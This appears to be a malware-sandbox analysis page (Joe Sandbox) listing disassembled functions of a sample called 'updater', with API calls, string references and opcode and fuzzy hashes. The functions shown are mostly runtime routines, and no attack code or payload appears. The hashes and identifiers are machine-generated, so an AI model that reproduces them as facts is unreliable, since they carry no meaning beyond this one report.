Part of subcall function 0141703F: EnterCriticalSection.KERNEL32(?,?,01427562,?,014503C8,0000000C), ref: 0141704E

EnumSystemLocalesW.KERNEL32(0141F7E2,00000001,014501A0,0000000C,0141FC0D,00000000), ref: 0141F827

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 20f62ac8142c7acd39087cec30c719708e30597b6393aeda4971e35b4d9d2842
Instruction ID: c190e09d80608df99ad9b5ce37fbc2679cc16ad2e24991ee4840a26395e9137c
Opcode Fuzzy Hash: 20f62ac8142c7acd39087cec30c719708e30597b6393aeda4971e35b4d9d2842
Instruction Fuzzy Hash: 68F08772A40200DFDB10EF99E841B887BF0EB14721F20442FE810EB2A1CBB5A8448B50

Uniqueness

Uniqueness Score: -1.00%

Function 0142ABD4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

EnumSystemLocalesW.KERNEL32(0142AB2D,00000001,00000000,?,?,0142B395,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0142AC0B

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f9e38161343b95a62d4723bc3dc4ae0206998fb0854258a3e49b9840d6571519
Instruction ID: f8d37d34994238df103a8a19f2db5d8cafceee08eef964bcee655d8cf0d1cea0
Opcode Fuzzy Hash: f9e38161343b95a62d4723bc3dc4ae0206998fb0854258a3e49b9840d6571519
Instruction Fuzzy Hash: 9DF05C3630021557CB149F3AD844666BF95EFC1610F56405EFF068B660C6319483C750

Uniqueness

Uniqueness Score: -1.00%

Function 013D2F5C Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 013D2F80

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 68dcc2e5919f9db94df7bdec11aac1e9b1139a1e89e50fd9cff21cd1f3e720a7
Instruction ID: 9f9331c33b3505af435a56ffafa85c0a1061142ab92a65a0c3f331e0ea2cf353
Opcode Fuzzy Hash: 68dcc2e5919f9db94df7bdec11aac1e9b1139a1e89e50fd9cff21cd1f3e720a7
Instruction Fuzzy Hash: 27E086B95053144FEF389B34A605B1E77F8A704608F4004ACC50BD2192E734D589CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0141493E Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 01414ABA

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
Instruction ID: 393166c91e755091f5e73b8cc084ee38fb18a6642b820cd7ae0406e9b552b737
Opcode Fuzzy Hash: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
Instruction Fuzzy Hash: 1151CB7225464956EB388A7D84947FFAF9BAB52380F0C001FD683DB3BDC73199468349

Uniqueness

Uniqueness Score: -1.00%

Function 013B4455 Relevance: 1.3, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

GetProcessHeap.KERNEL32(?,00000000,013CDD2B,80070216,?,?,?,?,00000000,?,?,?,013B4770,?,00000003,00000000), ref: 013B4481

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
String ID:
API String ID: 325507722-0
Opcode ID: 50f1514885ffbff1948c42be6d2ee7d90f03d179156e9ff5985ebb6e63912da3
Instruction ID: a15ddb68f18528f991e3b545c894cb6f3eb886b6d52b4cf2ffc1f3fa9029374d
Opcode Fuzzy Hash: 50f1514885ffbff1948c42be6d2ee7d90f03d179156e9ff5985ebb6e63912da3
Instruction Fuzzy Hash: F911BF31508741CBC722ABAAF48476937B1E7A0336F14011FE111DF1FAEB74A485EB14

Uniqueness

Uniqueness Score: -1.00%

Function 013B8547 Relevance: .7, Instructions: 690COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
Instruction ID: 21a40d16f2c4d035e6a95c7dc936a62172911ce773fccc53736fcb1e47b48c26
Opcode Fuzzy Hash: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
Instruction Fuzzy Hash: 612282B7F515144BDB0CCA5DCCA23ECB2E3AFD4218B0E813DA90AE3745EA7DD9158684

Uniqueness

Uniqueness Score: -1.00%

Function 0141C6F6 Relevance: .7, Instructions: 655COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
Instruction ID: ee636f2dd882e72e64df85534f63ac7f5b9db4f39c1d4def27f92760e39da3b7
Opcode Fuzzy Hash: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
Instruction Fuzzy Hash: 04329D74A4020ACFCB19CFACCDD5ABEBBB5EF44304F15416AD845A7369D631AA06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01426129 Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f192a7fe9303fc6ffdcde38b42a7a93f7ce0fc63f8907f37a526e49bc25277
Instruction ID: eb7cf8fe880d6e4f29dabdedab8cc3435c72e4c73101c7c3132b75db793caebc
Opcode Fuzzy Hash: 52f192a7fe9303fc6ffdcde38b42a7a93f7ce0fc63f8907f37a526e49bc25277
Instruction Fuzzy Hash: D8320372D2AF514DD7239538D8223366649AFA72C4F56D737FC19B5AAAEB38C4C34200

Uniqueness

Uniqueness Score: -1.00%

Function 013D9082 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
Instruction ID: 15d49bb9b8c6399156f47937971d817de0f70208272a91f8da4d2374a3bceeff
Opcode Fuzzy Hash: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
Instruction Fuzzy Hash: DC026072E0420A9FDB15DF6DE490AADBBF2EF8821CF144069D945AB351EB31ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013F0EF6 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69c7eb3893c19ee6bea2b25a671256e7d27ce8eae43ca5379412f86c5d99afc
Instruction ID: aec6ad690fcd0480027c6d61e92e77537a9b760c1421a7baf898c65fce83eee6
Opcode Fuzzy Hash: a69c7eb3893c19ee6bea2b25a671256e7d27ce8eae43ca5379412f86c5d99afc
Instruction Fuzzy Hash: 8B02B075E00A49DFDB16CFB8D890AAEB7B5FF49384F00832AEA157B251D7309842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013E364A Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalCurrentEnterSectionThread
String ID:
API String ID: 3488303727-0
Opcode ID: ca2b5203e5d241f50ba683346635383b8247aa23798b2bf0ece1920547a6daab
Instruction ID: b922cc39d5f6e4d961f63f40a0b6f40fbba1f4e9092bcefcba69a9f40fb7f645
Opcode Fuzzy Hash: ca2b5203e5d241f50ba683346635383b8247aa23798b2bf0ece1920547a6daab
Instruction Fuzzy Hash: CDD15772A043529FDB25DF38D8856AABBF1FF91324F14456EE8C58B281D734D846CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0142A3E3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: 9ee5f7f98cdb552c601273d9858fcd9381198ccc73d67d83a3e8e6d5815ac4d6
Instruction ID: 9479b3be793f4ab6928b174181c9cb9f460ebaf25fbae6be6baa4c653dea1ed8
Opcode Fuzzy Hash: 9ee5f7f98cdb552c601273d9858fcd9381198ccc73d67d83a3e8e6d5815ac4d6
Instruction Fuzzy Hash: E0B105755003128BDB359A29CC91AB7B3E8EF50308FA4446EDE87C7A61EB74E5C68B10

Uniqueness

Uniqueness Score: -1.00%

Function 013E3818 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalCurrentEnterSectionThread
String ID:
API String ID: 3488303727-0
Opcode ID: 40bc18dd9853e0603fdaa9c5c8a53828e9fba5b14cc560dec0985f00115aba6f
Instruction ID: 9df6043f1521a45581c29740eb87788c70b06eaa139fddc4e2d47d530acfa6ba
Opcode Fuzzy Hash: 40bc18dd9853e0603fdaa9c5c8a53828e9fba5b14cc560dec0985f00115aba6f
Instruction Fuzzy Hash: 15B1E671B043529FDB24DF2CD484B6ABBE5BF84718F04852DE9869B391DB30E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0141836D Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
Instruction ID: 3486a6439eeadb9509ae052d0b024a689e196f057afaaebe8ae7b2c51d4e150b
Opcode Fuzzy Hash: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
Instruction Fuzzy Hash: A5517271E0011AEFDF05CF99C980AAEBBB2EF88300F19806DE515AB355D7359E51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0142EA5F Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343129a808a60ef9b6d5979a0bbd1374011e7430ea1edd7c28fe48b61a52bac6
Instruction ID: cc42e10a0d53c9894fab824a83b24d491ce23b664001472062d4a980b973ce69
Opcode Fuzzy Hash: 343129a808a60ef9b6d5979a0bbd1374011e7430ea1edd7c28fe48b61a52bac6
Instruction Fuzzy Hash: 4021B373F205394B7B0CC47E8C532BDB6E1C78C641745823AF8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 0142E93F Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ed3eed4962f88ab9b7fd60c1589db3cafdf35f6e5c584bf46cf2c751d7f1dd
Instruction ID: af3dfb2b4890cdd9021c45a81d09690ac7d211d7b84a2dc2906976dab9fbf6e3
Opcode Fuzzy Hash: 21ed3eed4962f88ab9b7fd60c1589db3cafdf35f6e5c584bf46cf2c751d7f1dd
Instruction Fuzzy Hash: 76117363F30C255A675C816A8C172BAA5D2EBD825074F533BD826E7384E9A4DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 01410F70 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7ca771a036b871646cd3d74429a4ca5d8f3af78ec322649894cb4c84b28c669f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 8E110BB770118143E6148A3DC9B66BBDF95EAC5221B2D4277F3424BB7CD272D185A900

Uniqueness

Uniqueness Score: -1.00%

Function 013B72BC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58dd59d11c31016f2ed846ab868ddea041b11fab4c947be6458138c07cc6c13d
Instruction ID: 035a618a5a9f929fb9f6649c5659e9464b2c8b6cca09cc2e623191b78b0de456
Opcode Fuzzy Hash: 58dd59d11c31016f2ed846ab868ddea041b11fab4c947be6458138c07cc6c13d
Instruction Fuzzy Hash: 5C2154705250B10ACB5D863AA862536BF90DBC720238F42ABEBCBE94C6C539D121D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0140CEA8 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0140CEAE
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0140CEBC
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0140CECD
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0140CEDE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0140CEEF
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0140CF00
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0140CF11
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0140CF22
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0140CF33
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0140CF44
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0140CF55
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0140CF66
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0140CF77
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0140CF88
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0140CF99
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0140CFAA
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0140CFBB
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0140CFCC
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0140CFDD
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0140CFEE
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0140CFFF
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0140D010
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0140D021
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0140D032
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0140D043
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0140D054
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0140D065
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0140D076
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0140D087
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0140D098
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0140D0A9
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0140D0BA
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0140D0CB
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0140D0DC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0140D0ED
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0140D0FE
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0140D10F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0140D120
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0140D131
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0140D142
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0140D153

Strings

InitOnceExecuteOnce, xrefs: 0140CF06
InitializeSRWLock, xrefs: 0140D09E
AcquireSRWLockExclusive, xrefs: 0140D0AF
CreateSymbolicLinkW, xrefs: 0140CFF9
CreateThreadpoolWork, xrefs: 0140D0F3
LCMapStringEx, xrefs: 0140D148
FlsAlloc, xrefs: 0140CEB6
CreateThreadpoolTimer, xrefs: 0140CF4A
GetCurrentPackageId, xrefs: 0140D005
SetThreadpoolTimer, xrefs: 0140CF5B
CreateSemaphoreW, xrefs: 0140CF28
FlsFree, xrefs: 0140CEC2
SetFileInformationByHandle, xrefs: 0140D038
CloseThreadpoolWait, xrefs: 0140CFB0
GetLocaleInfoEx, xrefs: 0140D137
GetFileInformationByHandleEx, xrefs: 0140D027
GetCurrentProcessorNumber, xrefs: 0140CFE3
kernel32.dll, xrefs: 0140CEA9
WaitForThreadpoolTimerCallbacks, xrefs: 0140CF6C
SubmitThreadpoolWork, xrefs: 0140D104
FlsSetValue, xrefs: 0140CEE4
SetThreadpoolWait, xrefs: 0140CF9F
SleepConditionVariableSRW, xrefs: 0140D0E2
InitializeConditionVariable, xrefs: 0140D05A
SleepConditionVariableCS, xrefs: 0140D08D
FlsGetValue, xrefs: 0140CED3
FlushProcessWriteBuffers, xrefs: 0140CFC1
GetTickCount64, xrefs: 0140D016
CreateThreadpoolWait, xrefs: 0140CF8E
FreeLibraryWhenCallbackReturns, xrefs: 0140CFD2
GetSystemTimePreciseAsFileTime, xrefs: 0140D049
ReleaseSRWLockExclusive, xrefs: 0140D0D1
CreateEventExW, xrefs: 0140CF17
WakeAllConditionVariable, xrefs: 0140D07C
TryAcquireSRWLockExclusive, xrefs: 0140D0C0
InitializeCriticalSectionEx, xrefs: 0140CEF5
